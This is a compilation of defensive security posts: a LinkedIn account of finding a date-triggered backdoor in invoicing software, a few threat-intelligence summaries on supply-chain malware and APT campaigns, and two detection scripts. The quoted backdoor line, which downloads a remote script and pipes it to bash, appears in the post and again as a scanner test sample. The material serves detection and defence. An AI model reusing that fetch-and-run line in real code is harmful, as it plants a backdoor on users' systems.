Backdoor in client software: malicious code activated at Christmas, isolation, fix, report to CNIL/ANSSI. #CyberSécurité #Backdoor #Tech #ANSSI #CNIL ... https://www.linkedin.com/posts/gabriel-chandesris_cybersaezcuritaez-backdoor-tech-share-7463290277684768768-lH3U
#cybersécurité #backdoor #tech #anssi #cnil | Gabriel.. C.

🕵️‍♂️ Cybersecurity: the day I discovered a backdoor in a client's software (and how to react)

**Context**: During a routine audit for a client (an industrial SME), I spotted *suspicious code* in their internal management software.

---

🔹 **The discovery**: While analysing a script meant to handle *customer invoices*, I spotted this strange line:
*"if datetime.now() == datetime(2023, 12, 25): os.system("wget hxxps://exemple[.]com/fichier_suspect.sh | bash")"*
→ A *Trojan horse* programmed to activate on *25 December* (when nobody is working).

---

🔹 **Our immediate response**:
1. *Isolate the system*: Immediate disconnection of the server from the network.
2. *Find the origin*: The malicious code had been *injected via a compromised update* to the software.
3. *Fix and secure*:
- Removal of the malicious code.
- Change of *all passwords*.
- Deployment of an *intrusion detection system*.
4. *Report to the authorities*: Complaint filed with the *CNIL* and the *ANSSI*.

---

💡 **Lessons learned**:
- *Audit your code regularly*: Even "trusted" software can be compromised.
- *Limit permissions*: Invoicing software has *no need* to execute system commands.
- *Backups = your best insurance*: Without them, this client would have lost *3 years of data*.

---

💬 Have you ever discovered an unexpected security flaw? #CyberSécurité #Backdoor #Tech #ANSSI #CNIL

LinkedIn
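The post's second lesson, that invoicing software has no business executing system commands, can be turned into a static check. The script below is an added example, not code from the post or its author: it walks a Python module's AST, flags calls to os.system / subprocess, and reports whether each call sits under an if-condition that reads the clock, which is the shape of the date-gated line quoted in the post. The invoice module it scans is constructed here; only the quoted os.system line comes from the post.

```python
"""Find shell-execution calls in Python source and note whether each one is
gated by a condition that reads the clock (the date-bomb pattern in the post).
Added example: SAMPLE_MODULE below is constructed; only the quoted os.system
line is taken from the post."""
import ast

# (module, attribute) pairs that hand a string to a shell or spawn a process
SHELL_EXEC = {
    ("os", "system"), ("os", "popen"),
    ("subprocess", "run"), ("subprocess", "Popen"),
    ("subprocess", "call"), ("subprocess", "check_output"),
}
CLOCK_NAMES = {"datetime", "date", "time"}
CLOCK_ATTRS = {"now", "today", "utcnow"}


def _module_attr(func):
    """Return (module, attr) for a call like os.system(...), else None."""
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return func.value.id, func.attr
    return None


def _reads_clock(test):
    """True if an if-condition references datetime/date/time or .now()/.today()."""
    for sub in ast.walk(test):
        if isinstance(sub, ast.Name) and sub.id in CLOCK_NAMES:
            return True
        if isinstance(sub, ast.Attribute) and sub.attr in CLOCK_ATTRS:
            return True
    return False


class ShellExecFinder(ast.NodeVisitor):
    """Collect shell-exec calls together with the if-conditions enclosing them."""

    def __init__(self):
        self.findings = []
        self._enclosing_ifs = []

    def visit_If(self, node):
        self._enclosing_ifs.append(node)
        self.generic_visit(node)
        self._enclosing_ifs.pop()

    def visit_Call(self, node):
        target = _module_attr(node.func)
        if target in SHELL_EXEC:
            self.findings.append({
                "line": node.lineno,
                "call": ".".join(target),
                "time_gated": any(_reads_clock(i.test) for i in self._enclosing_ifs),
            })
        self.generic_visit(node)


def scan_source(source):
    """Return a list of findings (line, call, time_gated) for one source file."""
    finder = ShellExecFinder()
    finder.visit(ast.parse(source))
    return finder.findings


# Constructed invoice module; the os.system line is the one quoted in the post.
SAMPLE_MODULE = '''
import os
from datetime import datetime

def generate_invoice(customer):
    total = sum(item["price"] for item in customer["items"])
    if datetime.now() == datetime(2023, 12, 25):
        os.system("wget hxxps://exemple[.]com/fichier_suspect.sh | bash")
    return total
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE_MODULE):
        flag = "TIME-GATED " if f["time_gated"] else ""
        print(f"line {f['line']}: {flag}{f['call']}")
```

Any shell-exec call in an invoicing module is worth a look; the time-gated flag just orders the review queue. Run it over every .py file a vendor update delivers, and keep a short allow-list for the few places where process spawning is expected.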

New burrowing techniques

Webworm is a China-aligned APT group that has evolved its tactics since first being discovered in 2022, shifting focus from Asian targets to European governmental organizations. In 2025, the group deployed two new backdoors: EchoCreep, which uses Discord for command and control, and GraphWorm, which leverages Microsoft Graph API. Researchers decrypted over 400 Discord messages revealing four victims and analyzed a compromised Amazon S3 bucket used for data exfiltration. The group stages tools in GitHub repositories and uses multiple custom proxy solutions including WormFrp, ChainWorm, SmuxProxy, and WormSocket to create hidden networks. Webworm appears to exploit web vulnerabilities using tools like nuclei and dirsearch for initial access, targeting government entities and educational institutions across Europe and South Africa.

Pulse ID: 6a0df33ecc667be61a0a9608
Pulse Link: https://otx.alienvault.com/pulse/6a0df33ecc667be61a0a9608
Pulse Author: AlienVault
Created: 2026-05-20 17:45:34

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Africa #Amazon #Asia #BackDoor #China #CyberSecurity #Discord #Education #Europe #GitHub #Government #ICS #InfoSec #Microsoft #OTX #OpenThreatExchange #Proxy #RAT #Worm #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

The Worm That Keeps on Digging: Latest Wave

A sophisticated supply chain campaign targeting the open source developer ecosystem has emerged, compromising NPM packages in the @antv namespace, GitHub Actions including actions-cool/issues-helper, and the VSCode extension nrwl.angular-console. The malware initiates multi-stage infection chains using GitHub-hosted infrastructure and orphaned commits to deploy payloads via bun. It harvests extensive credentials including GitHub tokens, SSH keys, cloud credentials, and browser secrets, exfiltrating data through attacker-controlled public GitHub repositories. The campaign establishes persistence through a Python backdoor that polls GitHub for signed commands containing specific trigger strings, enabling remote code execution. Infrastructure analysis and operational patterns indicate moderate confidence attribution to the threat actor TeamPCP.

Pulse ID: 6a0c5b666ccb232590e33087
Pulse Link: https://otx.alienvault.com/pulse/6a0c5b666ccb232590e33087
Pulse Author: AlienVault
Created: 2026-05-19 12:45:26

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Browser #Cloud #CyberSecurity #GitHub #InfoSec #Malware #NPM #OTX #OpenThreatExchange #Python #RAT #RCE #RemoteCodeExecution #SSH #SupplyChain #Troll #Worm #bot #AlienVault

APT Targets Azerbaijani Oil and Gas Industry

A sophisticated multi-wave intrusion campaign targeted an Azerbaijani oil and gas company from late December 2025 through late February 2026, attributed with moderate-to-high confidence to the Chinese APT group FamousSparrow. The operation exploited unpatched Microsoft Exchange servers via ProxyShell and ProxyNotShell vulnerabilities to establish initial access. Attackers deployed two distinct backdoor families - Deed RAT and Terndoor - across three separate waves, demonstrating operational persistence by repeatedly exploiting the same entry point despite remediation attempts. Technical analysis revealed an evolved DLL sideloading technique using a two-stage trigger mechanism that gates execution through legitimate application control flow, effectively evading automated sandbox analysis. The campaign extended FamousSparrow's known targeting to South Caucasus energy infrastructure, coinciding with Azerbaijan's increased strategic importance to European energy security following disruptions in Russian and Mi...

Pulse ID: 6a0d96aadcfeadab9eea10d0
Pulse Link: https://otx.alienvault.com/pulse/6a0d96aadcfeadab9eea10d0
Pulse Author: AlienVault
Created: 2026-05-20 11:10:34

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Azerbaijan #BackDoor #Caucasus #Chinese #CyberSecurity #Europe #InfoSec #Microsoft #OTX #OpenThreatExchange #Proxy #RAT #Russia #SideLoading #bot #AlienVault

Popular node-ipc npm Package Infected with Credential Stealer

A supply chain attack has compromised the node-ipc npm package, with malicious versions 9.1.6, 9.2.3, and 12.0.1 containing obfuscated stealer and backdoor functionality. The attack vector involved takeover of a dormant maintainer account through an expired email domain. The malware fingerprints host environments, enumerates and reads local files including SSH keys, cloud credentials, database configurations, and various developer secrets. Collected data is compressed into a gzip archive and exfiltrated via DNS TXT queries to attacker-controlled infrastructure disguised as legitimate Azure domains. The payload targets over 100 file patterns across macOS and Linux systems, focusing on developer credentials from AWS, Azure, GCP, Kubernetes, Docker, npm, GitHub, and numerous other services. The malicious code executes during CommonJS module loading, forking a detached child process to perform credential harvesting while avoiding detection through obfuscation and DNS-based covert channels.

Pulse ID: 6a0d970e99916e7e7e17c893
Pulse Link: https://otx.alienvault.com/pulse/6a0d970e99916e7e7e17c893
Pulse Author: AlienVault
Created: 2026-05-20 11:12:14

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AWS #Azure #BackDoor #Cloud #CredentialHarvesting #CyberSecurity #DNS #Docker #Email #GitHub #InfoSec #Linux #Mac #MacOS #Malware #NPM #OTX #OpenThreatExchange #RAT #SSH #SupplyChain #Troll #ZIP #bot #AlienVault

A Grantler
@agrantler.bsky.social
· 5 Min.
Running bitlocker with TPM only without PIN has never been a good idea. Question is, why there's the WinRE feature for unlocking the device at all. This looks really like a #backdoor.
And there are rumors there's a vulnerability for TPM+PIN, too.
We'll see.

#microsoft #infosec #cybersec #yellowkey #news

https://thehackernews.com/2026/05/microsoft-releases-mitigation-for.html

Microsoft Releases Mitigation for YellowKey BitLocker Bypass CVE-2026-45585 Exploit

Microsoft released mitigations for YellowKey, a publicly disclosed BitLocker bypass tracked as CVE-2026-45585 with a CVSS score of 6.8.

The Hacker News

Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor

Pulse ID: 6a0e909c639e7bf719f13c28
Pulse Link: https://otx.alienvault.com/pulse/6a0e909c639e7bf719f13c28
Pulse Author: Tr1sa111
Created: 2026-05-21 04:57:00

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CyberSecurity #DNS #InfoSec #OTX #OpenThreatExchange #bot #Tr1sa111

Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor

Pulse ID: 6a0e90b664bc1f5af00fb81d
Pulse Link: https://otx.alienvault.com/pulse/6a0e90b664bc1f5af00fb81d
Pulse Author: Tr1sa111
Created: 2026-05-21 04:57:26

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CyberSecurity #DNS #InfoSec #OTX #OpenThreatExchange #bot #Tr1sa111

Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor

A long-running typosquatting campaign impersonated the widely used shopspring/decimal Go library by publishing github.com/shopsprint/decimal, differing by a single character. Active since November 2017, the package remained benign through seven releases until being weaponized in August 2023 with version v1.3.3. This version introduced a malicious init() function that executes automatically on import, establishing a DNS TXT record-based command and control channel to dnslog-cdn-images.freemyip.com. The backdoor polls every five minutes and executes arbitrary commands returned via TXT records. Although the GitHub repository and owner account have been deleted, the malicious module remains permanently cached and accessible through Go's module proxy system, continuing to pose a supply chain risk to developers who mistype the package name.

Pulse ID: 6a0d278a6320921cb57f8b69
Pulse Link: https://otx.alienvault.com/pulse/6a0d278a6320921cb57f8b69
Pulse Author: AlienVault
Created: 2026-05-20 03:16:26

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CDN #CyberSecurity #DNS #GitHub #InfoSec #OTX #OpenThreatExchange #Proxy #SupplyChain #TypoSquatting #bot #developers #AlienVault
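Both the node-ipc entry earlier in this feed and the shopsprint/decimal entry above come down to one defender's question: does a project's lock data pull in a package the feed reports as compromised? The script below is an added example, not code from either pulse or from the affected projects. It checks go.mod/go.sum lines for the typosquatted module path and package-lock.json (lockfile versions 1 and 2/3) for the three node-ipc versions named in the feed. The manifests it scans are constructed, and the h1: sums in them are placeholders rather than real checksums.

```python
"""Audit dependency manifests for the two compromised packages named in this
feed: the shopsprint/decimal typosquat of shopspring/decimal (Go) and the
backdoored node-ipc releases 9.1.6, 9.2.3 and 12.0.1 (npm).
Added example: the manifests below are constructed and the h1: sums are
placeholders, not real checksums."""
import json
import re

# Typosquatted Go module path -> the module the developer almost certainly meant
GO_TYPOSQUATS = {
    "github.com/shopsprint/decimal": "github.com/shopspring/decimal",
}
# npm package -> versions the feed reports as carrying the stealer/backdoor
NPM_BAD_VERSIONS = {"node-ipc": {"9.1.6", "9.2.3", "12.0.1"}}

# Matches "path vX.Y.Z ..." lines in go.mod (with or without a leading
# "require") and in go.sum, which lists every module in the build graph.
_GO_LINE = re.compile(r"^\s*(?:require\s+)?(\S+)\s+(v\d\S*)")


def audit_go_modules(text):
    """Return (line, module_path, version, intended_path) for typosquatted modules."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = _GO_LINE.match(line)
        if m and m.group(1) in GO_TYPOSQUATS:
            findings.append((lineno, m.group(1), m.group(2), GO_TYPOSQUATS[m.group(1)]))
    return findings


def audit_package_lock(text):
    """Return (lock_key, package, version) for known-bad npm versions.

    Handles lockfileVersion 2/3 ("packages" keyed by node_modules path,
    including nested installs) and lockfileVersion 1 (nested "dependencies")."""
    lock = json.loads(text)
    findings = []

    for key, meta in lock.get("packages", {}).items():
        # strip any nesting prefix; keeps "@scope/name" intact
        name = key.rsplit("node_modules/", 1)[-1]
        version = meta.get("version")
        if version in NPM_BAD_VERSIONS.get(name, ()):
            findings.append((key, name, version))

    def walk_v1(deps, prefix):
        for name, meta in deps.items():
            version = meta.get("version")
            if version in NPM_BAD_VERSIONS.get(name, ()):
                findings.append((prefix + name, name, version))
            walk_v1(meta.get("dependencies", {}), prefix + name + "/")

    if "packages" not in lock:
        walk_v1(lock.get("dependencies", {}), "")
    return findings


# Constructed go.sum: a clean shopspring line beside the one-character typosquat.
GO_SUM_SAMPLE = """github.com/shopspring/decimal v1.3.1 h1:PLACEHOLDER_SUM
github.com/shopspring/decimal v1.3.1/go.mod h1:PLACEHOLDER_SUM
github.com/shopsprint/decimal v1.3.3 h1:PLACEHOLDER_SUM
github.com/shopsprint/decimal v1.3.3/go.mod h1:PLACEHOLDER_SUM
"""

# Constructed package-lock.json (lockfileVersion 3) pinning a backdoored release.
PACKAGE_LOCK_SAMPLE = json.dumps({
    "name": "billing-ui",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "billing-ui", "dependencies": {"node-ipc": "^9.1.5"}},
        "node_modules/node-ipc": {"version": "9.1.6"},
        "node_modules/some-helper": {"version": "1.0.0"},
    },
})

if __name__ == "__main__":
    for lineno, path, version, intended in audit_go_modules(GO_SUM_SAMPLE):
        print(f"go.sum:{lineno}: {path} {version} -> did you mean {intended}?")
    for key, name, version in audit_package_lock(PACKAGE_LOCK_SAMPLE):
        print(f"package-lock.json: {key} pins {name}@{version} (known compromised)")
```

Running the Go check against go.sum rather than only go.mod matters, because the typosquat can arrive transitively and go.sum lists every module in the build graph. The check is on the module path, not on whether the upstream repository still exists: the pulse notes that the module stays cached and served by the Go module proxy after the GitHub repository and account were deleted.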

QLNX: the new silent Linux implant that plunders the software supply chain

Trend Micro has discovered Quasar Linux RAT (QLNX), a sophisticated, previously undocumented Linux implant that targets developers and DevOps environments. Capable of fileless execution, a dual LD_PRELOAD + eBPF rootkit, and systematic theft of npm, PyPI, AWS and Kubernetes tokens, QLNX is a concrete threat to the entire software development chain.

https://insicurezzadigitale.com/qlnx-il-nuovo-implant-linux-silenzioso-che-saccheggia-la-supply-chain-del-software/